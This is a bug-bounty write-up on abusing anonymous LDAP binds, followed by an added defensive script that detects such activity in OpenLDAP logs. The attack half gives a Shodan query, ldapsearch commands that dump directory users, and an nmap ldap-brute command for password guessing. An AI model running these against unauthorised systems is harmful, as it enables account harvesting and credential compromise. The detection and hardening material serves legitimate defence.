LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet.
I chose a random paying target, REDACTED.com, running a Responsible Disclosure program.
As usual, I started my personal tool "BREXET"; it gathered lots of subdomains and ran nmap over every one of them. Going through the output, I found an interesting one: port 389 with anonymous bind enabled.
Such hosts can also be found with Shodan, using the query ssl:target port:"389"
Anonymous LDAP binding allows a client to connect to and search the directory (bind and search) without authenticating. You do not need to supply a bind DN (binddn) or a bind password (bindpasswd).
Now we can try to discover the base DN with an ldapsearch query against the root DSE:
ldapsearch -h <TARGET IP> -p 389 -x -s base -b '' "(objectClass=*)" "*" +
Take note of the naming context (the base DN). With it we can enumerate the LDAP users along with their access details, UIDs, and so on,
using this command:
ldapsearch -h <TARGET IP> -p 389 -x -b "dc=xxx,dc=xxx,dc=xx"
There were lots of users; here is what one user's LDAP entry looked like:
# aab, users, compat, doman_name
With this, an attacker can try brute-forcing passwords, or check the discovered usernames against a default password list using nmap:
nmap -p 389 --script ldap-brute --script-args ldap.base='"dc=xxx,dc=xxxx,dc=xx"' <target ip>
Note: you can use JXplorer to do the same; just connect to the port with it.
Note: run the nmap scan on all subdomains if the target scope is big.
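Both steps above, the anonymous bind and subtree search with ldapsearch and the ldap-brute run, leave a recognisable trail in the directory server's own logs, which is what a defender should be watching for. The script below is an added example written for this write-up; it is not code from the original post or from any tool mentioned in it. It assumes OpenLDAP's default "stats" log format (loglevel 256), and the log excerpt, IP addresses, DNs and connection numbers in it are constructed sample data.

```python
"""Flag anonymous LDAP binds and bind brute-forcing in OpenLDAP slapd logs.

Added example, not code from the original post or any project it names.
Assumes the default OpenLDAP 'stats' log format; SAMPLE_LOG below is a
constructed excerpt and every IP, DN and connection number in it is made up.
"""
import re
from collections import defaultdict

# Constructed slapd log excerpt. conn=1000 is the enumeration the post
# describes (empty-DN bind, rootDSE read, subtree dump of the base);
# conn=1001 is a password-guessing loop against one user (err=49 is
# LDAP_INVALID_CREDENTIALS); conn=1002 is an ordinary authenticated client.
SAMPLE_LOG = (
    'conn=1000 fd=12 ACCEPT from IP=203.0.113.7:51234 (IP=0.0.0.0:389)\n'
    'conn=1000 op=0 BIND dn="" method=128\n'
    'conn=1000 op=0 RESULT tag=97 err=0 text=\n'
    'conn=1000 op=1 SRCH base="" scope=0 deref=0 filter="(objectClass=*)"\n'
    'conn=1000 op=1 SEARCH RESULT tag=101 err=0 nentries=1 text=\n'
    'conn=1000 op=2 SRCH base="dc=example,dc=com" scope=2 deref=0 filter="(objectClass=*)"\n'
    'conn=1000 op=2 SEARCH RESULT tag=101 err=0 nentries=312 text=\n'
    'conn=1001 fd=13 ACCEPT from IP=203.0.113.7:51240 (IP=0.0.0.0:389)\n'
    + ''.join(  # six failed simple binds against the same user
        f'conn=1001 op={i} BIND dn="uid=aab,ou=users,dc=example,dc=com" method=128\n'
        f'conn=1001 op={i} RESULT tag=97 err=49 text=\n'
        for i in range(6)
    )
    + 'conn=1002 fd=14 ACCEPT from IP=10.0.0.5:40000 (IP=0.0.0.0:389)\n'
    'conn=1002 op=0 BIND dn="uid=svc,ou=users,dc=example,dc=com" method=128\n'
    'conn=1002 op=0 RESULT tag=97 err=0 text=\n'
)

ACCEPT_RE = re.compile(r'^conn=(\d+) fd=\d+ ACCEPT from IP=([\d.]+):\d+')
BIND_RE = re.compile(r'^conn=(\d+) op=(\d+) BIND dn="([^"]*)" method=(\d+)')
BIND_RESULT_RE = re.compile(r'^conn=(\d+) op=(\d+) RESULT tag=97 err=(\d+)')  # tag 97 = BindResponse
SRCH_RE = re.compile(r'^conn=(\d+) op=(\d+) SRCH base="([^"]*)" scope=(\d)')
SRCH_RESULT_RE = re.compile(r'^conn=(\d+) op=(\d+) SEARCH RESULT tag=101 err=\d+ nentries=(\d+)')


def analyze(log_text, brute_threshold=5):
    """Correlate BIND/SRCH operations with their RESULT lines per connection.

    Returns anonymous binds that were accepted, every search issued on an
    anonymously bound connection (with base, scope and entry count), and
    the source IPs whose failed binds reach brute_threshold.
    """
    conn_ip = {}                 # conn id -> client IP from the ACCEPT line
    pending = {}                 # (conn, op) -> ('bind', dn) | ('srch', base, scope)
    anon_conns = set()           # conns whose bind succeeded with an empty DN
    failures = defaultdict(int)  # client IP -> count of err=49 bind results
    findings = {'anonymous_binds': [], 'anonymous_searches': []}

    for line in log_text.splitlines():
        if m := ACCEPT_RE.match(line):
            conn_ip[m[1]] = m[2]
        elif m := BIND_RE.match(line):
            pending[(m[1], m[2])] = ('bind', m[3])
        elif m := SRCH_RE.match(line):
            pending[(m[1], m[2])] = ('srch', m[3], int(m[4]))
        elif m := BIND_RESULT_RE.match(line):
            op = pending.pop((m[1], m[2]), None)
            if not op or op[0] != 'bind':
                continue
            ip, err, dn = conn_ip.get(m[1], '?'), int(m[3]), op[1]
            if err == 0 and dn == '':
                anon_conns.add(m[1])
                findings['anonymous_binds'].append((m[1], ip))
            elif err == 49:
                failures[ip] += 1
        elif m := SRCH_RESULT_RE.match(line):
            op = pending.pop((m[1], m[2]), None)
            if op and op[0] == 'srch' and m[1] in anon_conns:
                findings['anonymous_searches'].append(
                    {'conn': m[1], 'ip': conn_ip.get(m[1], '?'),
                     'base': op[1], 'scope': op[2], 'nentries': int(m[3])})

    findings['bind_failures'] = dict(failures)
    findings['brute_force_sources'] = sorted(
        ip for ip, n in failures.items() if n >= brute_threshold)
    return findings


if __name__ == '__main__':
    report = analyze(SAMPLE_LOG)
    for conn, ip in report['anonymous_binds']:
        print(f'anonymous bind accepted: conn={conn} from {ip}')
    for s in report['anonymous_searches']:
        print(f"anonymous search from {s['ip']}: base={s['base']!r} "
              f"scope={s['scope']} nentries={s['nentries']}")
    for ip in report['brute_force_sources']:
        print(f"possible bind brute force from {ip}: {report['bind_failures'][ip]} failures")
```

Point it at the slapd log (or `journalctl -u slapd` output) instead of SAMPLE_LOG; a scope=2 search with a large nentries on an anonymously bound connection is exactly the directory dump described above. On OpenLDAP the underlying exposure is closed with `olcDisallows: bind_anon`, optionally together with `olcRequires: authc` so that unauthenticated operations are refused outright.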
With this I got lucky and obtained an LDAP user's credentials (thanks to nmap).
Once you get access, use JXplorer to browse the directory.
After reporting it, I earned a good bounty.
If you have any questions, just DM me on Twitter.